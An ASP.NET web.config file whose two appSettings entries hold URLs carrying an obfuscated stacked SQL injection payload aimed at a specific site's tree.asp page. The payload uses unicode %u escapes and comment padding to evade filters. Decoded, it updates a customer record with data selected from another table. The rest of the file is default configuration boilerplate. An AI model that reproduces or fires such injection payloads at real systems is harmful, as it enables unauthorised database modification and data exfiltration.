<?xml version="1.0"?>
<configuration>
	<connectionStrings/>
	<appSettings>
		<add key="SetID" value="http://www.wcm777.hk/member/9gtree/tree.asp?csnid=0';upd%u0041%u0054%u0065/*fhds*/%u0052%u0065g_cu%u0073%u0054om%u0065%u0052%u0073/*fhds*/%u0073%u0065%u0054/*fhds*/%u0041dd%u0052%u0065%u0073%u0073=(%u0073%u0065%u004C%u0065c%u0054/*fhds*/%u0073%u004Eid/*fhds*/%u0041%u0073/*fhds*/ju%u0073%u0054%u0054%u0065%u0073%u0054/*fhds*/f%u0052om/*fhds*/%u004Coc%u0041%u0054io%u004E/*fhds*/wh%u0065%u0052%u0065/*fhds*/%u0042%u0041ckoffic%u0065di%u0073p%u004C%u0041y%u004E%u0041m%u0065='11111111'/*fhds*/fo%u0052/*fhds*/xm%u004C/*fhds*/p%u0041%u0054h(''))/*fhds*/wh%u0065%u0052%u0065/*fhds*/cu%u0073%u0054id=22222222;--"/>
		<add key="SetLock" value="http://www.wcm777.hk/member/9gtree/tree.asp?csnid=0';upd%u0041%u0054%u0065/*fhds*/%u0052%u0065g_cu%u0073%u0054om%u0065%u0052%u0073/*fhds*/%u0073%u0065%u0054/*fhds*/%u0041dd%u0052%u0065%u0073%u0073=(%u0073%u0065%u004C%u0065c%u0054/*fhds*/%u0073%u004Eid/*fhds*/%u0041%u0073/*fhds*/ju%u0073%u0054%u0054%u0065%u0073%u0054/*fhds*/f%u0052om/*fhds*/%u004Coc%u0041%u0054io%u004E/*fhds*/wh%u0065%u0052%u0065/*fhds*/%u0042%u0041ckoffic%u0065di%u0073p%u004C%u0041y%u004E%u0041m%u0065='11111111'/*fhds*/fo%u0052/*fhds*/xm%u004C/*fhds*/p%u0041%u0054h(''))/*fhds*/wh%u0065%u0052%u0065/*fhds*/cu%u0073%u0054id=22222222;--"/>
	</appSettings>
	<system.web>
		<!-- 
            Set compilation debug="true" to insert debugging 
            symbols into the compiled page. Because this 
            affects performance, set this value to true only 
            during development.
        -->
		<compilation debug="true">
		</compilation>
		<!--
            The <authentication> section enables configuration 
            of the security authentication mode used by 
            ASP.NET to identify an incoming user. 
        -->
		<authentication mode="Windows"/>
		<!--
            The <customErrors> section enables configuration 
            of what to do if/when an unhandled error occurs 
            during the execution of a request. Specifically, 
            it enables developers to configure html error pages 
            to be displayed in place of a error stack trace.

        <customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">
            <error statusCode="403" redirect="NoAccess.htm" />
            <error statusCode="404" redirect="FileNotFound.htm" />
        </customErrors>
        -->
	</system.web>
	<system.codedom>
	</system.codedom>
	<!-- 
        The system.webServer section is required for running ASP.NET AJAX under Internet
        Information Services 7.0.  It is not necessary for previous version of IIS.
    -->
	<system.webServer>
	</system.webServer>
</configuration>
